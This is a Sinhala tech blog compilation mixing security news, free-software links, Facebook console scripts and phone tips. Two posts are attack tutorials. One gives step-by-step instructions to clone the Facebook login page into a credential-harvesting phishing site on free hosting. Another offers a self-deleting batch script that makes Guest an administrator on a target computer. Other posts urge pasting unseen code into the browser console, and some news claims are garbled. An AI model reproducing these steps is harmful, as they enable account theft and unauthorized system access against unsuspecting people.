What Is The Key Logger..!!


මොකක්ද මේ කී ලොගර්ස් කියන්නෙ

මෙය කවර හෝ spyware විශේෂයක් වීමට පුළුවන්. මෙමගින් ඔබ කී බෝර්ඩ් එකේ මොනවා හෝ ටයිප් කරාද එය කී ලෝගර් එක හදපු hacker ට සෙන්ඩ් වෙනවා,ඉතින් මේක අපේ පරිගණක ජිවිතයට මෙන්ම සාමාන්‍ය ජිවිතයටත් තියෙන තර්ජයක්. ගොඩක් වෙලාවට මේ හරහා passwords, credit card numbers හා other confidential data වලට තමා ගේම දෙන්නෙ.

බලමු ආරක්ෂා වෙන පියවර මොනවද කියල? 

ඔයාගේ පරිගණකයට අනිවාර්යයෙන්ම හොඳ security system 1ක් සැපයිය යුතුයි. 
නමුත් එය හොඳ තත්වයේ security system එකක් විය යුතුයි.
 Avast,Kaspersky,Mcafee,Avira,K7 etc.. මෙවනි වර්ගයේ security system වඩාත් හොඳයි. 
ඔයා භාවිත කරන security system එක නොමිලේ ලබා දෙන සේවයක් උවද එහි ප්‍රශ්නයක් නෑ. 
හැබැයි crack,patch කර නැති licensed security system එකක් තමයි වෙළෙඳ පොලෙන් මිලදී ගත යුත්තේ. කිසි විටෙක security system එක update කරන්ක අමතක කරන්ඩ එපා.

Antilogger මෘදුකාංග භාවිතය
 Zemana Antilogger කියන මෘදුකාංගය පාවිච්චි කර ඔයාගේ PC එකට කී ලොගර්ස් වලින් සිදු වෙන තර්නනය නැති කර ගන්ට පුළුවන්. 
තවත් හොඳ Antilogger මෘදුකාංගයක් තමා Keyscrambler ඉතින් මෙමගින් පුළුවන් කී ලොගර්ස් වලින් ගැල වී සිටීමට. 
Online scan පරික්ෂාව මගිනුත් කී ලොගර්ස් මග හැරවා සිටිය හැකිය.

"මෙම පෝස්ටුව මගින් ඔබට ඒ ගැන මුලික දැනුමක් ලබා දීම පමණයි සිදු කළේ ඉදිරියේදී අපි ඔබට Key Logger එකක් සාදන හැටිත් , ඉන් ගැලවෙන ආකාරයත් කියා දීමට සුදානම් තවත් දවසක මේ වගේ පෝස්ටුවකින් හමු වෙමු."

Auto fb group poster 2014 100%working


කෝමද යාලුවනේ....ඔයාලට අද ගෙනාව තවත් අලුත් ස්ක්‍රිප්ට් එකක්...මේ ස්ක්‍රිප්ට් එක විශේෂෙන් වටින්නෙ අපේ බ්ලොග්,පේජ් කරන යාලුවන්ට තමයි...ඔයාලගෙ පෝස්ට් එකක් එක ගෘප් එකෙන් එක,ගෘප් එකෙන් එක පෝස්ට් කරන්න ගියොත් එපාවෙනවනේ...ඔයා ගෘප් 100ක විතර ඉන්නවනම් එහෙම කරන්න ගියොත් දවසකටත් වඩා යයි...මේ ස්ක්‍රිප්ට් එකෙන් ලේසියෙන් වගේම විනාඩි පහෙන් ගෘප් 100ක ‍වුනත් ඔයාගෙ පෝස්ට් එක ලේසියෙන්ම පෝස්ට් කරගන්න පුලුවන් 

මුලින්ම ඔයාගෙ එෆ් බී එකවුන්ටියට ලොග් වෙලා හෝම් පේජ් එකට යන්නකෝ....ඒ කියන්නෙ www.facebook.com වලට.....

>>>මේ පහළ click here බට්න් එක ක්ලික් කරල ගිහිං...ඒ පේජ් එකේ තියෙන කෝඩ් එක Ctrl+A ප්‍රෙස් කරල ඔක්කම සිලෙක්ට් කරගෙන Ctrl+C ප්‍රෙස් කරල ‍ඔක්කම එකපාර කොපි කරගන්නකෝ......

Click Here

>>>.ඊළඟට ,,, *ගූගල් ක්‍රෝම් බ්‍රවුසරේ භාවිතා කරන අය f12 බට්න් එක ප්‍රෙස් කරල console box එක අරගෙන අර කොපි කරගත්ත කෝඩ් එක ctrl+v ප්‍රෙස් කරල පේස්ට් කරල එන්ටර් බට්න් එක ප්‍රෙස් කරන්නකෝ....

,,,,,,*ඒ වගේම ‍ෆයර් ෆොක්ස් වෙබ් බ්‍රවුසරය භාවිතා කරන අය Ctrl+Shift+K ප්‍රෙස් කරල කොන්සෝල් බොක්ස් එක අරගෙන කොපි කරගත්ත කෝඩ් ctrl+v ප්‍රෙස් කරල පේස්ට් කරල එන්ටර් බට්න් එක ප්‍රෙස් කරන්නකෝ....

*ඒ වගේම ඔපෙරාමිනි පාවිච්චි කරන අය රයිග්ට් ක්ලික් කරල Inspect Element තෝරල එන බොක්ස් එකට කෝඩ් එක පේස්ට් කරල එන්ටර් ප්‍රෙස් කරන්නකෝ...... >>>එතකොට පොඩි මැසේජ් එකක් එයි Auto post wall group කියල ...ඒකෙ ok බට්න් එක ක්ලික් කරන්නකෝ.....

>>>එතකොටම එනව ඔයාට පෝස්ට් එක ටයිප් කරන්න පොඩි බොක්ස් එකක්...ඒ බොක්ස් එකේ ඔයාට ඕන පෝස්ට් එක ටයිප් කරල Post බට්න් එක ක්ලික් කරන්නකෝ....එතකොටම ඔක්කම ගෘප් වල පෝස්ට් වෙන්න පටංගන්නව...විනාඩි 2,3කින් ඔක්කගේම පෝස්ට් වෙලා පොඩි මැසේජ් එකක් එයි පෝස්ට් වෙලා ඉවරයි කියල....එතකොට F5 එක ක්ලික් කරල හරි...මවුස් එකෙ රයිග්ට් ක්ලික් කරල හරි පේජ් එක රීෆ්‍රෙෂ් කරගන්නකෝ...එතකොට වැඩේ ඉවරයි.... හරිනේ....එහෙමයි ස්ක්‍රිප්ට් එක වැඩ කරන්නෙ....ලේසියිනේ...ගැටලුවක්නම් කමෙන්ට් එකක් දාන්න අමතක කරන්නෙපා ඈ,..එහෙනම් අපිගියා බායි යාලුවනේ.....








All Password Changing Alert..



ලෝකයේ සියලු ඉන්ටර්නෙට් භාවිත කරන්නන්ගේ සියලු රහස් පද (passwords) වෙනස් කරන ලෙසට ජාත්‍යන්තර දැවැන්ත තාක්ෂණික සමාගම් රැසක් අනතුරු ඇඟවීම් කර තිබේ. පවතින රහස් පදවල (passwords) ආරක්ෂිතභාවය සම්බන්ධයෙන් විශාල දෝෂයක් පවතින බවට අනාවරණය වීම හේතුවෙනි. Yahoo සමාගම ඉල්ලා සිටින්නේ, සියලු රහස් පද වෙනස් කරන ලෙස ය. විශේෂයෙන් ඊමේල්, බැංකු (Banking) සහ ලිපිගොනු (File storage) සම්බන්ධයෙන් වන රහස් පද වහා වෙනස් කරන ලෙස එම සමාගම විශේෂයෙන් දැනුම් දී තිබේ.

මේ අතර, Heartbleed Bug නමැති ඉන්ටර්නෙට් වෛරසයක් පිළිබඳව ද දැඩි අවධානයෙන් සිටින ලෙස උපදෙස් දී ඇත. මේ සම්බන්ධයෙන් සැලකිලිමත් වන ලෙස Google සමාගම ද අනතුරු අඟවා තිබේ.



Sent You All Freind One Click Massage

එක Click එකේන් ඔයාගේ Facebook යාලුවන්ට Massage යවන්න


ඔන්න යාලුවනේ දැන් මම දෙන්න යන්නේ ඔයාට නියම භාණ්ඩයක්.මෙකේන් වේන්නේ ඔයාගේ Facebook එකේ ඔක්කෝ යාලුවන්ට එක Click එකේන් Massage යවන්න පුලුවන්...

හරි මම කියලා දෙන්නම් ක්‍ර්‍රෙම් පියවරේන් පියවර...

1.මුලින්ම ඔයාගේ WebBrowser එකේ Facebook යන්න....

2.දැන් Facebook එකේ Home ඉන්න ගමන්න F12 ඔබන්න...

3.දැන් පහත JavaScript එක Copy කරගේන අතන F12 එබුවට පස්සේ අපු DialogBox එකේ Consol වලට Past කරලා Enter ඔබන්න....
4.දැන් ඔයාගේ Facebook Tab එකේ PopUp Dialog Box එකක් එවි.දැන් එකේ ඔයාගේ Massage එක Type කරලා Post Butten එක ඔබන්න.

5.දැන් වැඩේ හරි.තවටිකකින් ඔයාට බලා ගන්න පුලුවන් Refesh කියලා Massage එකක්.දැන් ඉතින් ඔයාගේ  Facebook Tab Refesh කරන්න.දැන් වැඩේ හරි...

කෝහෝමද අද වැඩේ එළනේ. :P '.එහේනම් මම ගියා ඈ




Find You Facebook Profile Visitors.!

මෙන්න ඔයාගේ Facebook Profile එක බලන අය බලා ගන්න ක්‍රමයක්


හරි යාලුවනේ ඔන්න මම අයේ Video කැල්ලක් ගේනාවා.මෝකද මම මේ දවස් වල පෝඩ්ඩක් Busy මෙකනම් ඔයාලට හුගක් වටින එකක්.ඔන්න ඔක බලලම ඉන්නකෝ.....


මෙන්න මෙක තමයි අර Code එක {"list":


හරි ඔන්න එහේනම් මම යනවා...අයේ සෙට් වෙනකල් කාණ්ඩෙට බුදු සරණයි දෙවි පිහිටයි...

 එහේනම් මම ගියා .තවත් දවසක තවත් Post එකක් දානකං මෙකට Comments,Like,Follow පාරක එහේම දාලා තියන්න.
!!!.කස්ටියටම සුහම සුහ සතුට සාමය පිරි සූහම සූහ අලුත් අවුරුද්දක් වේවා.!!!
 

Windows 8.1 Free Hurry Up

windows 8.1 නොමිලේ


windows 8.1 තමයි අලුත්නිම ආපු වින්ඩෝස් OS එක වගේම ගොඩක් ජනප්‍රිය OS එක. මේ ලිපිය ලියන්න පරක්කු වුනේ windows 8.1 මම ටික කාලයක් පාවිච්චි කරල බැලුව කොහොමද කියල windows 8 කට වඩා නම් ගොඩක් හොදයි. පහල තියනව ඔයාලට අවශ්‍ය windows 8.1 මෘදුකාංගය නොමිලේම බාගෙන බලන්න කොහොමද වැඩ කියල.

1 Download to Click here

2 Download to Click here

3 Download to Click here


IP Hide Part 2 and Final Part


               IP Hide දෙවැනි කෝටස සහා අන්තිම කෝටස.!

හරි යාලුවනේ ඔයාලට කෝහෝමද ඉතින්.ඔන්න මං අද ඔයාලට ගේනාවා ඔයාලා මෙච්චර කලක් බලා පෝරෝත්තුව හිටපු IP Hide දෙවැනි කෝටස .මෙක බලන්න කලින් IP Hide පළවෙනි කෝටස බලන්න මෙන්න මෙතනින් යන්න.හරි මම ඔන්න Video එකක් ගේනාවා එහේනම් එක බලලාම ඉන්නකෝ.

 

මෙන්න මේ යටින් යන්න මම අර Video එකේ කියපු Software කැල්ල ගන්න...
http://hola.org/
 එහේනම් මම ගියා .තවත් දවසක තවත් Post එකක් දානකං මෙකට Comments,Like,Follow පාරක එහේම දාලා තියන්න.
!!!.කස්ටියටම සුහම සුහ සතුට සාමය පිරි සූහම සූහ අලුත් අවුරුද්දක් වේවා.!!!

Hacking Facebook Very Easy

ගේමක් නැතුව facebook hack කරමු !!!!!


ඔන්න යාලුවනේ ඔයාල ඉල්ලපුම දේ ගේනවා .”මොකද්ද බන් උබේ බ්ලොග් එක FB hack කරන විදිහවත් නෑ .අනේ උබ දන්න hacking .කෝ උබ දානවා කිව්වට දැම්මේ නැනේ .”ඔය මම පහුගිය දවස් වල කස්ටියගෙන් අහපු දේවල් .මට කියන්න තින්නේ ඒ අය hacking කියන වචනේ තේරුමවත් දන්නේ නැද්ද කොහෙද .ගොඩක් ය හිතන්නේ hack කරනවා කියන්නේ මේ facebook .email වගේ hack කරන ඒවා කියල .මොලේ තරම තමා .ඔයාල දන්නේ නැති වුනාට ඔයාලත් නොදනිම hack කරලා ඇති මොනවා හරි .ඒ අතින් බැලුවම ඔයත් hacker කෙනෙක් .කාටද ආඩම්බර .මේ පොස්ට් එක ගැන මගේ ගොඩක් යාලුවෝ අවදානෙන් හිටියේ. සමහරු දාපන්කෝ දාපන්කෝ කියල messages තුත් එවල තිබ්බ .කොහෙන් කොහොමහරි මේක දාන එක කල් ගියේ .තිබ්බ වැඩ නිසාත්, ගෙදරින් ලැප් එක ගහනවට ලෙඩ වැටුන නිසාත් ,පන්ති යන්න සිද්ද වුන නිසාත් නෙවේ .මන් ඒවා ගනකටවත් ගන්නේ නෑ .මෙහෙම පොස්ට් එකක් දාන එකේ බැරෑරුම් කම ගැන පොඩ්ඩක් උපදෙස් ගන්න ඕන නිසා .ඔයාල දන්නවනේ මම බාගෙට දෙයක් කියල දෙන්නේ නෑ . එනිසා මේක සම්පුරයෙන් තේරුම් යන විදිහට කියල දෙනවා .හැබැයි කවමදාවත් මේක වැරදි දෙකට යොදාගන්න එපා !! මේන් වැන්ද _/\_

හොදයි එහෙනම් බයිලාව එවරයි දැන් වැඩේට බහිමු .facebook hack කරන්න ක්‍රම කිහිපයක් තිනවා .මන් දැනට නම් දන්නේ ක්‍රම 5. තව ඇති කවුද දන්නේ !.කොහොමහරි 90% ම hackers ල facebook database එකට රිංගල password හොරගන්නේ නෑ .එහෙනම් කොහොමෙයි hack කරන්නේ .hack කරන්න්නේද .එහෙම කරන්නේ ඉතින් අපිව ගොනාට අන්දවල තම .මේකත් ඒ ක්‍රමයක් .මේ ක්‍රමේ දැනගත්තට මදි .පොඩ්ඩක් මොලේ පාවිච්චි කරන්න ඕන .සමහරු අහනව facebook hack කරන්න software තිනවද කියල .100% වැඩ කරන එකක් හොයා ගත්ත කෙනෙක් ඉන්නවනම් comment එකක් දන්නා බලන්න . ඇත්තටම කිව්වොත් එහෙම software නෑ facebook hack කරන්න .එහෙනම් ඔය ඕනෑතරම් net එකේ තියෙන්නේ .තියෙනවා තම එත් වැඩකරන්නේ නෑ .බොරු videos එහෙම දල තිනවා .අපි ඒවා download කරන වාරයක් පාසා එයාලට සල්ලි හම්බවෙන එක වෙන්නේ .නැතුව ඒ එකක්වත් වැඩකරන්නේ නෑ .ඒ නිස ඔය මේ වැඩේට software හොයනවනම් එක බොරු වැඩක් . හොදයි මේ වැඩේට කියන්නේ facebook pishing කරනවා කියල .

මේ ගැන ඕනෑතරම් වෙන බ්ලොග් වලත් දල ඇති .පවුද්ගලිකව මමත් බ්ලොග් වල මේක තිනවා දැකල තිනවා .එත් 100% නෑ .මොකද සමහර එවල script එක වැරදි .සමහර එවල තින site වල free web hosting .කරන්න බෑ .මන් මේ මොනවා දොඩවනව දකියල සමහරුන්ට තේරෙන්නෙත් නැතුව ඇති .බයවෙන්න එපා ඔය ඉක්මනටම මේ දේවල් ඉගෙන ගනීවි .අපි මේ කරන වැඩේන් කරන්නේ facebook වගේ පෙනුම තීන site එකක් හදල එකෙන් අපිට hack කරන්න ඕන කෙනව log කරවන එක .එතකොට email ,password ඔක්කොම අපේ අතේ .ඉස්සෙල්ල කිව්වා වගේ මේකත් ඇන්දිල්ලක් තමා . හොදයි ඔයාල මුලින්ම කරන්න ඕන pishing සිතේ එකක් හදාගන්න එක .එක කරන්නේ මෙහෙමයි .ඔයාල මේ post එක බලන බ්‍රොව්සෙර් එකේ fb ලොග් වෙලා ඉන්නවනම් .log out වෙන්න .ඊට පස්සේ facebook .com ගිහල්ල right click කරලා save as දීල ,save as type එක web page ,complete දීල ඕන තැනක save කරගන්න


.ඊට පස්සේ  Welcome to Facebook - Log In, Sign Up or Learn More කියල තින  html file එක notepad එකෙන් open කරන්න .ඊට පස්සේ ctrl +f click කරලා මේ code එක දල find next කරන්න
action="https://www.facebook.com/login.php?login_attempt=1" method="post"



ඊටපස්සේ එක මේ වගේ editකරන්න
action="login.php " method="GET"


පස්සේ එක save කරලා වෙනම අපහු notepad එක ඕන කරලා පල්ලෙහා link එකේ තින code එක ඒකට copy කරන්න


දැන් ඕක login.php කියල save  කරන්න .
වැඩේ හරි pishing page එකක් හදල ඉවරයි .ඕනනම් ඔයාලට අර මුලින් edit කරපු html file එක advance edit කරන්නත් පුළුවන් .මම එහෙම හදපු pishing site එකක් තිනවා එක පල්ලෙහායින්  ඕනනම් බාගන්න


ok දැන් අපි මේ files දෙක host කරන්න ඕන .එකට ගොඩක් site තිනව එත් free හොස්ටින්ග් site තින්නේ ටිකයි. .ගොඩක් අය මේකට use කරන්නනේ www.000webhost.com කියන site එක හැබැයි එකේ site එකක් host කරව ගන්න එක ටිකක් අමාරුයි .ගොඩක් අය ඒ හින්දම මේ වැඩේ අතැරලා දානව .ඒ නිසාම මම තනියෙන්ම free hosting site එකක් හොයාගත්ත .සොයන්නාට සම්බවෙනවා කියනවනේ .එකේ address එක තම .http://www.1freehosting.com/ මේකේ host කරන හැටි මම කියල දෙන්නම් .ඉස්සෙල්ලම ඉතින් ඔයාල මේකේ account එකක් හදාගන්නකෝ .මම account එකක් හදල තින නිසා එකෙන් ලොග් වෙනව .
ඔයාල මේකේ domain එකක් හදනවට වඩා subdomain එකක් හදන එක හොදයි මොකද ඩොමින් එකක් හැදුවට එක වැඩ කරන්නේ නැති වෙන්න පුළුවන් .



subdomain එකක් හැදුවට පස්සේ hosting tab එකෙන් ගිහිල්ල ඔයාල හදපු site එක ඉස්සර තින switch කියන එක click කරලා control panel එකට යන්න .ඊටපස්සේ එකේ තින file manager  කියන එකට යන්න


ඔයාල file manager එක create කරලා එකට අර files ටික upload කරන්න
දැන් හරි දැන් ඔයාලට තින්නේ ඔය html එකේ link එක අරගෙන ඒ site එකෙන් ඔයාට hack කරන්න ඕන කෙනව log කරවන එක .එක ඉතින් ඔයාලට බාරයි .පොඩ්ඩක් මොලේ  දල බලන්න .බලමුකෝ එතකොට වෙන්නේ මොකද්ද කියල ඔන්න මම pishing site  එකෙන් ලොග් වෙනව .





මම email එක විදිහට දැම්මේ tesing@gmail.com password එක testingpassword දැන් ලොග් වෙලා බලමු
දැක්කද login.txt කියල file එකක් හැදිලා තිනවා එකේ email ,password මේ විදිහට තිනවා


කොහොමද වැඩේ .මේ වැඩේ දන්නවා වුනාට වැඩක් නෑ පොඩ්ඩක් මොලේ කල්පනා කරන්නත් ඕන .කොහෙන් කොහොමහරි මේකෙන් බේරෙන විදිහත් කියන්න එපැය .කියන්න දෙයක් නැ කලින් පොස්ට් එකේ එක දාලම තිනවා .එක කියවපු නැති ය ඉන්නවනම් මෙතනින්  ගිහිල්ල එක කියවන්න .ඔය  pishing site එකකට අහුවුණා කියල හිතනවානම් එසැනින් password එක වෙනස් කරන්න .එත් hacker ගව පරණ password එකක් තිනවා එකත් එයට අවස්තවක් වෙන්න පුළුවන් .ඒ නිසා ඔය අපහු අහුවුණු pishing site එකට ගිහිල්ල බොරු email password දල අපහු ලොග් වෙන්න එතකොට අර text file එක replace වෙනව .හොදයි ගැටළු අනිවා ඇති commentකරන්නකෝ .උදව් දීමට සුදානම්. තවත් වෙනස් hacking ක්‍රමයකින් නැවත හමුවෙමු !.එතකන් බුදුසරණයි _/\_

පසුව ලියමි 
ගොඩක් අයට host කරන්න යද්දී ප්‍රශ්න ඇවිල්ල වගේ .මේ ප්‍රශ්න ඔක්කොටම විසදුම තම proxy software එකක් use කරන එක .මන් නම් උසේ කලේ safe ip  කියන සොෆ්ට් එක එක පල්ලෙහා ලින්ක් එකෙන් ගිහින් offcial site එකෙන්ම බාගන්න


ඒ වගේම dongle එකෙන් ගිහින් මෙහි account එකක් සැදීමේදී අපහසුතා ඇතිවිය හැකි බැවින් slt වැනි lan connection එකක් බාවිතා කරන්න .good luck !




How to Hack Computer Administrator Password

ADMINISTRATOR HACK කරමුද ?



මුලින්ම Notepad එක open කර ගන්න. මේ Codes ටික Copy & Paste කරන්න Note Pad එකට.

echo off
title Please wait...
cls
net user add Username Password /add
 net user localgroup Administrators Username /add
 net user Guest 420 /active:yes
 net localgroup Guests Guest /DELETE
 net localgroup Administrators Guest /add
 del %0 

දැන් ඉතින් අපේ වැඩේ ඉවරයි... අන්තිමට කරන්න තියෙන්නේ පරිස්සමට මේක Save කරන්න විතරයි. Guest2admin.bat කියලා ගහලා සේව් කරගන්න. 

ඊට පස්සේ ඔයාට Hack කරන්න ඕනේ පරිගණකයට මේක අරන් ගිහින් Run කරන්න.

Very Good & Faster Download Software 90% World People Use This Software


දැන්  ඉතින් එක එක Download Software වලට Register Keys Cracks හොය හොයා යන්න දෙයක් නැහැ මෙන්න ගෙනාව සුපිරි බාන්ඩයක්..

IDM එකට වැඩ දහස් ගුණයකින් හොද ඩවුන්ලෝඩ් සොෆ්ට්වෙයා එකක් තමයි මන් මේ ගෙනාවේ මේකේ තියන විශේෂ හේතුව තමයි මේකේ IDM එකේ වගේ Register කරන්න Crack කරන්න ඕනේ නැහැ...

මේකේ නම තමයි Eagle Get Download කියන එක මේක සම්පුර්ණයෙන්ම Free දෙන සොෆ්ට්වෙයා එකක් මෙන්න මෙතනින් ගිහින් බාගන්න 
  
   Click Here to Download Eagle Get Download Software

All of Password Change Danger Alarm.!

සියලු රහස් පද (passwords) වෙනස් කරන ලෙසට අනතුරු ඇඟවීමක්!

 සියලු රහස් පද (passwords) වෙනස් කරන ලෙසට අනතුරු ඇඟවීමක්!

ලෝකයේ සියලු ඉන්ටර්නෙට් භාවිත කරන්නන්ගේ සියලු රහස් පද (passwords) වෙනස් කරන ලෙසට ජාත්‍යන්තර දැවැන්ත තාක්ෂණික සමාගම් රැසක් අනතුරු ඇඟවීම් කර තිබේ.
ඒ, පවතින රහස් පදවල (passwords) ආරක්ෂිතභාවය සම්බන්ධයෙන් විශාල දෝෂයක් පවතින බවට අනාවරණය වීම හේතුවෙනි.
Yahoo සමාගම ඉල්ලා සිටින්නේ, සියලු රහස් පද වෙනස් කරන ලෙස ය.
විශේෂයෙන් ඊමේල්, බැංකු (Banking) සහ ලිපිගොනු (File storage) සම්බන්ධයෙන් වන රහස් පද වහා වෙනස් කරන ලෙස එම සමාගම විශේෂයෙන් දැනුම් දී තිබේ.
මේ අතර, Heartbleed Bug නමැති ඉන්ටර්නෙට් වෛරසයක් පිළිබඳව ද දැඩි අවධානයෙන් සිටින ලෙස උපදෙස් දී ඇත.
මේ සම්බන්ධයෙන් සැලකිලිමත් වන ලෙස Google සමාගම ද අනතුරු අඟවා තිබේ.

Microsoft Company Idea in World Computer 3%2-1 Danger.!


Microsoft සමාගමේ තීරණයෙන් ලෝකයේ පරිගණකවලින් තුනෙන් එකක් අනතුරේ!


 Microsoft සමාගමේ තීරණයෙන් ලෝකයේ පරිගණකවලින් තුනෙන් එකක් අනතුරේ! වසර 12කට පසු Windows XP මෙහෙයුම් පද්ධතිය (operating system) සම්බන්ධ සියලු සහයක නතර කිරීමට Microsoft සමාගම තීරණය කර තිබේ.
ඒ අනුව, ලබන අඟහරුවාදා සිට Windows XP තාක්ෂණික වශයෙන් යල් පැන ගිය මෙහෙයුම් පද්ධතියක් ලෙස සැලකීමට Microsoft පියවර ගනු ඇත.
තාක්ෂණික විශේෂඥයින් අනතුරු අඟවනුයේ, අඟහරුවාදා සිට ලොව පරිගණකවලින් තුනෙන් එකක් වෛරසයන්ට සහ සයිබර් ප්‍රහාරයන්ට ලක්වීමේ අවදානමක් පවතින බව ය.
ලබන අඟහරුවාදා සිට මෙම මෙහෙයුම් පද්ධතියේ ක්‍රියාකාරීත්වය නතර නොකරන අතර එහි ආරක්ෂණ යාවත්කාලීන කිරීම් (security updates), දෝෂ නිරාකරණය කිරීම සඳහා ගනු ලබන ක්‍රියාමාර්ග (hot fixes), තාක්ෂණික යාවත්කාලීන කිරීම් (online technical content updates) හෝ සියලු ම තාක්ෂණික සහයයන් ලබා දීම පමණක් අත්හිටුවනු ඇත.
මෙම ක්‍රියාමාර්ගය ත් සමග මේ වන විට Windows XP භාවිත කරන පරිගණකවල පවතින දෝෂ නිරාකරණය නොවී පවතිනු ඇත.
යුරෝපා සයිබර් අපරාධ නිරීක්ෂණ මධ්‍යස්ථානය පවසන්නේ, Windows XP සහිත පරිගණයකින් ඉන්ටර්නෙට් සමග සම්බන්ධ වුවහොත් එම පරිගණක සයිබර් ප්‍රහාරකයන්ට ලෙහෙසියෙන් ම ගොදුරු වීමේ අවදානමක් පවතින බව ය.
මේ අතර, ලොව පුරා ඇති ස්වයංක්‍රීය ටෙලර් යන්ත්‍රවලින් 95%ක පමණ Windows XP භාවිත වන බව ද අනාවරණය වී තිබේ.

Install Softwares & Games in Chines Phones

චයිනීස් ෆෝන් වල‍‍ට ගේම්ස් සහ සොෆ්ට්වෙයාර්ස් දාන්න

                   

ඔන්න යාලුවනේ අද ගෙනාවෙත් ඔයාලට වට්නා ලිපියක්.චයිනීස් ෆෝන් වල‍‍ට ජාවා ගේම්ස් සහ සොෆ්ට්වෙයාර්ස් දාන්න බෑ කියලා අපි හැමෝම දන්නවනේ..ඒකට විසදුමක් තමා මම අද ඉදිරිපත් කරන්න යන්නේ... චයිනීස් ෆෝන් වල‍‍ට වර්ග 2ක ගේම්ස් සහ සොෆ්ට්වෙයාර්ස් වැඩ කරනවා.. ඒ .nes සහ .mrp කියන වර්ග 2. .nes ගැන ඔයාල දැනටම දන්නවා ඇති.මොකද ගොඩක් අය දන්නවා ඒවා දාන විදිහ. හොදයි එතකොට .nes ගැන ගොඩක් අය දන්නවා නම් .mrp ගැන කියන්නේ මොන එහෙකටද කියලා ඔයාල බලනවා ඇති.හේතුව තමා .nes ගේම්ස් ගොඩක් චයිනීස් ෆෝන්ස් වලට වැඩ නෑ.ඒත් .mrp ගේම්ස් ගොඩක් ඒවට වැඩ.ඉතින් .nesවැඩ නෑ කියලා අඩ අඩ ඉන්න ඕන නෑ... දැන්මම ඔයාගේ ෆෝන් එක අරන් *#220807# ගහන්න.මොනවම හරි ප්‍රතිචාරයක් ලැබුනොත් ඔන්න වැඩේ හරි.ගොඩක් වෙලාවට ඉන්ටර්නෙට් කනෙක්ට් වෙනවා වගේ ප්‍රතිචාරයක් තමා ලැබෙන්නේ... හරි දැන් එහෙම ප්‍රතිචාරයක් ලැබෙනවා නම්වැඩේට බහිමු.
මුලින්ම මේක ඩවුන්ලෝඩ් කරගන්න 
                 Click Here to Download

හරි දැන් ඒක අන්සිප් කරගන්න. ඊලගට ඔයාගේ ෆෝන් එකේ මෙමරි කාඩ් එකේ mythroad කියලා ෆෝල්ඩර් එකක් හදන්න. දැන් අර අන්සිප් කරගත්ත එකේ තිබ්බ dsm_gm.mrp කියන ෆයිල් එක ඔයාගේ ෆෝන් එකේ මෙමරි කාඩ් එකේ අර හදපු mythroad ෆෝල්ඩර් එක ඇතුලට දාන්න.. දැන් ඉතින් ඔන්න වැඩේ හරි... දැන් මේ වෙබ් සයිට් එකට ගිහින් හොද හොද .mrp applications ටිකක් ඩවුන්ලෝඩ් කරගන්න

                Click Here to Download

ඔන්න ඔය ඩවුන්ලෝඩ් කරගත්ත ඒවත් අර mythroad ෆෝල්ඩර් එක ඇතුලටම දාන්න... දැන් ආපහු *#220807# ගහන්න... ඔන්න එතකොට එයි App List කියලා මෙනු එකක්.ඒකේ ඇති ඔයා ඩවුන්ලෝඩ් කරපු ගේම්ස් එහෙම...දැන් ඉතින් open කරලා play කරන්න... ඔන්න එහෙනම් වැඩේ හරි නේ... අපිත් ගියා සදා ජය​

Enable Old Facebook Theme Style


හායි ගායිස් ඔන්න මේ දවස් වල එෆ් බී අලුත් ලුක් එකකින් ඇවිල්ලා නේ ඒ හින්දා අපි ඔයාලට දෙනවා පරණ විදියටම එෆ් බී එක ගන්න විදිය පරණ කිව්වේ මේකෙන් පුළුවන් පරණම ස්ටයිල් එක,දැන් තියෙන එකට කලින් එක කියන දෙකම ගන්න ඔන්න ඕකයි සීන් එක මුලින්ම පහත ලින්ක් එකෙන් ගිහින් ඇඩෝන් එක ඉන්ස්ටෝල් කරගන්නකො
හරිනේ දැන් බ්‍රවුසර් එක රීස්ටර්ට් කරන්න

දැන් ප්‍රොෆයිල් එහෙම පරණ විදියටනේ තීන්නේ

දැන් එෆ් බී සෙටින්ග් වලට යන බට්න් එක ඔබන්නකෝ දැන් ඇති Social Reweaver කියලා එක ක්ලික් කරලා ඔයාට ඕන විදියට චැට්,ප්‍රොෆයිල් එක එහෙම වෙනස් කරගන්න....

එහෙනම් අපි ගියා බායි.....!

අවුලක් ආවොත් මට මැසේජ් එකක් දාන්න

මෙන්න මගේ එකවුන්ට් එක

Hallmark Card Studio Create You Wishing Cards


                                                  අපිට විවිධ අවස්ථවලදි සුභ පැතුම් පත් ඕනෙ වෙනවා උදාහරණයක් විදිහට උපන් දින වලට.ඉතින් අපි කරන්නෙ මොකක්ද කඩෙන් ගිහිල්ලා එකක් ගන්න එක. ඒත් අද ඉඳන්නම් එහෙම ඕනෙ නෑ මොකද අපිට මේ සොෆ්ට්වෙයා එකෙන් ගේමක් නැතුවම සුභ පැතුම් පත් හදාගන්න පුලුවන්.මේකෙ එක එක කාඩ් වර්ග 5000ක් විතර තියනවා clipart 13000ක් විතර තියනව ඒක නිසා ලේසියෙන්ම අපිට කාඩ් හදාගන්න පුලුවන්,දන්නැති අය ඉන්නවනම් ඉගෙන ගන්න මේකෙ video tutorial තියනවා. එහෙනම් පහලින් බාගන්න.
                                                         Click Here To Download

Send Dialog SMS to 12 Cent


ඔන්න මම දෙන කියල දෙන්න හදන්නේ dialog වල SMS සත 12  ට යවන්න පුළුවන් විදියක්...

වෙනදා රුපියල් 100 ට වැඩියෙන් තියනවනම් විතර නේ SMS එකක් සත 12 ට යන්නේ අද මම කියල දෙන්න හදන්නේ රුපියල් 100 ට අඩුවෙන් තියන වෙලාවටත් කොහොමද සත 12 ට යවන්නේ කියල.... මේක  හරිම ලේසිය් පොඩි දෙයය් කරන තියෙන්නේ....

යවන්න ඕන දේ type කරලා යවන යවන්න ඕන කෙනාගේ නම්බර් එකට පුංචි වෙනසක් කරන්න විතරයි තියෙන්නේ..  මෙන්න මේ විදියට තමය එක වෙන්නේ...

උදාහරණයක් විදියට මේ නම්බර්  එක ගමුකො අපි.. 0777123456 (මේක ඇවිල්ල Dialog එකේ Custom Service නම්බර් එක එකට කමක් නැහැ...)

කරන්න තියෙන්නේ නම්බෙර් එකට ඉස්සරහින් 100 ට්ය්පේ කරලා Send කරන එක විතරයි..

0777123456  >>>> 100777123456  ගහල Send කරන එක විතරයි

මෙන්න අපේ Facebook Group එකට එකතු වෙලා මේ වගේ ගොඩක් දේවල් දෙන ගන්න

Dialog 1350 MB Free Only Soft Lanka Gift


